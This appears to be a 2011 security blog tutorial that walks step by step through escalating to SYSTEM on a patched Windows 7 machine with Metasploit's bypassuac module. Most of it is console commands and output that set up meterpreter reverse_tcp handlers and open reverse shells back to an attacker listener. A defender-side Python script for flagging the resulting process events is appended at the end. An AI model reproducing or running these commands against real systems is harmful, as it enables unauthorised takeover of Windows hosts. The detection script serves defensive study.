Privilege escalation – Windows UAC bypass

In the previous tutorial we covered privilege escalation by abusing a weakness in the operating system. That technique only works on unpatched Windows Vista, Windows Server 2008 and Windows 7; once Windows is patched, the schelevator script can no longer be used, so a different technique is needed. One option is to bypass UAC (User Account Control).

According to Wikipedia:

User Account Control (UAC) is a technology and security infrastructure introduced with Microsoft's Windows Vista and Windows Server 2008 operating systems, with a more relaxed version also present in Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

So when a program that has no Windows publisher certificate is run with administrator rights, Windows shows a warning like the one in the image above.

Tools:

– Metasploit v3.7.0-dev
– OS: Windows 7 x64, fully patched

Without the UAC bypass:

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 682 exploits - 350 auxiliary
+ -- --=[ 218 payloads - 27 encoders - 8 nops
       =[ svn r12260 updated today (2011.04.06)

resource (multihander.rc)> use exploit/multi/handler
resource (multihander.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (multihander.rc)> set LHOST 172.16.16.2
LHOST => 172.16.16.2
resource (multihander.rc)> set LPORT 443
LPORT => 443
resource (multihander.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.16.2:443
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (749056 bytes) to 172.16.16.15
[*] Meterpreter session 1 opened (172.16.16.2:443 -> 172.16.16.15:49157) at 2011-04-07 15:35:40 +0700
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ian-PC\ian
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >

When we try to escalate privileges, Windows blocks the attempt: getsystem fails with "Access is denied".

With the UAC bypass:

meterpreter > background
msf exploit(handler) > back
msf > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options (post/windows/escalate/bypassuac):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
LHOST                     no        Listener IP address for the new session
LPORT    4444             no        Listener port for the new session
SESSION                   yes       The session to run this module on.

msf post(bypassuac) > set LHOST 172.16.16.2
LHOST => 172.16.16.2
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit -j
[*] Post module running as background job
msf post(bypassuac) >
[*] Started reverse handler on 172.16.16.2:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Sending stage (749056 bytes) to 172.16.16.15
[*] Meterpreter session 2 opened (172.16.16.2:4444 -> 172.16.16.15:49158) at 2011-04-07 15:37:50 +0700
[*] Session ID 2 (172.16.16.2:4444 -> 172.16.16.15:49158) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rqsMMaqTfYiwB.exe (2928)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2356
[*] New server process: notepad.exe (2356)
msf post(bypassuac) > sessions -l

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x86/win32  ian-PC\ian @ IAN-PC  172.16.16.2:443 -> 172.16.16.15:49157
  2   meterpreter x86/win32  ian-PC\ian @ IAN-PC  172.16.16.2:4444 -> 172.16.16.15:49158
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: ian-PC\ian
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Privilege escalation now succeeds.

How it works:

The bypassuac module uses the windows/meterpreter/reverse_tcp payload by default. The helper executable that performs the bypass (data/post/bypassuac-x64.exe) is uploaded to the target system; Metasploit then generates the payload and uploads the result to the target as well. After that, bypassuac-x64 is executed with the command: bypass-x64.exe /c meterpreter_payload.exe.
The payload also migrates automatically into another process (in the session above, a freshly spawned notepad.exe).
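As an added defender-side example (not from the post and not Metasploit's own code), the script below scores constructed process-creation events for the three traits visible in the session above: a binary staged in a user-writable directory, a machine-generated-looking name such as rqsMMaqTfYiwB.exe, and one executable launching another via "/c". The event format, directory patterns and thresholds are assumptions for this example.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (not real logs), modelled on the session
# output above: a randomly named stager in the user's Temp directory, the
# bypass helper launching it with "/c", and the notepad.exe host it migrates into.
SAMPLE_EVENTS = [
    {"pid": 2928, "image": r"C:\Users\ian\AppData\Local\Temp\rqsMMaqTfYiwB.exe",
     "cmdline": r"C:\Users\ian\AppData\Local\Temp\rqsMMaqTfYiwB.exe"},
    {"pid": 2930, "image": r"C:\Users\ian\AppData\Local\Temp\bypassuac-x64.exe",
     "cmdline": r"bypassuac-x64.exe /c C:\Users\ian\AppData\Local\Temp\rqsMMaqTfYiwB.exe"},
    {"pid": 2356, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"C:\Windows\System32\notepad.exe"},
]

# Heuristics (assumptions for this example, not Windows or Metasploit facts):
# user-writable staging directories and a "/c <file>.exe" launch pattern.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\Windows\\Temp\\", re.I)
LAUNCH_VIA_C = re.compile(r"\s/c\s+(\S+\.exe)\b", re.I)

def case_switches(name):
    # Upper/lower alternations: generated names such as rqsMMaqTfYiwB flip
    # case far more often than ordinary binary names like notepad.
    letters = [c for c in name if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())

def event_reasons(event, min_switches=3):
    # Return every indicator that fires for one event.
    reasons = []
    image = event["image"]
    if USER_WRITABLE.search(image):
        reasons.append("runs from a user-writable directory")
    if case_switches(PureWindowsPath(image).stem) >= min_switches:
        reasons.append("image name looks machine-generated")
    match = LAUNCH_VIA_C.search(event["cmdline"])
    if match:
        reasons.append("launches another executable via /c: " + match.group(1))
    return reasons

def find_suspicious(events, min_reasons=2):
    # Map pid -> reasons for events with at least min_reasons indicators;
    # a single indicator (e.g. any AppData binary) is too noisy on its own.
    hits = {}
    for event in events:
        reasons = event_reasons(event)
        if len(reasons) >= min_reasons:
            hits[event["pid"]] = reasons
    return hits

for pid, reasons in find_suspicious(SAMPLE_EVENTS).items():
    print(pid, "->", "; ".join(reasons))
```

On the constructed events the stager (2928) and the helper launching it (2930) are flagged, while the notepad.exe host (2356) is not; migration itself needs a different telemetry source than process creation.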

hope you enjoy

Posted on April 7, 2011, in Hacking & security. 1 Comment.

  1. I wish I'd found this earlier...
